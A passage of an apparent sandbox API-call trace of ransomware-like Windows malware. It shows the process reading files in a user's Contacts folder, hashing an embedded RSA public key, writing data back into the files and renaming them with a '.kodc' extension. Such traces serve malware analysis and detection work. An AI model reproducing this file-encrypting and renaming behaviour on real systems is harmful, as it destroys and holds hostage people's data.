HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a4a8 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7208 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x495, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb14*=0x495, lpOverlapped=0x0) returned 1 [0097.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.349] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.350] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.350] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.350] CloseHandle (hObject=0x5cc) returned 1 [0097.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.352] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.kodc")) returned 1 [0097.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.353] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.354] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0097.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.355] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0097.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.355] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=68382) returned 1 [0097.355] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.359] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.359] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.361] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.361] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.361] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0097.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d0958 [0097.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.362] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.363] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.363] CryptHashData (hHash=0x3331b88, pbData=0x32d0958, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.363] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32f7268 [0097.363] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x32f7268, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32f7268, pdwDataLen=0x9e2fa54) returned 1 [0097.363] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.364] SetLastError (dwErrCode=0x0) [0097.364] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.365] GetLastError () returned 0x0 [0097.365] SetLastError (dwErrCode=0x0) [0097.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.366] SetLastError (dwErrCode=0x0) [0097.366] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.367] GetLastError () returned 0x0 [0097.367] SetLastError (dwErrCode=0x0) [0097.368] GetLastError () returned 0x0 [0097.368] SetLastError (dwErrCode=0x0) [0097.368] GetLastError () returned 0x0 [0097.368] SetLastError (dwErrCode=0x0) [0097.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.368] CryptDestroyHash (hHash=0x3331b88) returned 1 [0097.368] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.368] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.368] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.368] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10b20) returned 0x9ba4d90 [0097.369] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d0958 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a4a8 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a328 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.370] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f7208 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a550 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x32b75c0 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7268 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f71e8 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7208 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.371] GetCurrentThreadId () returned 0x42c [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695888 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316f78 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.372] GetCurrentThreadId () returned 0x42c [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33186b8 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecd0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecf0 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecd0 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7208 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5c8 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a580 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7248 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f71c8 [0097.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.374] HeapFree (in: hHeap=0x630000, 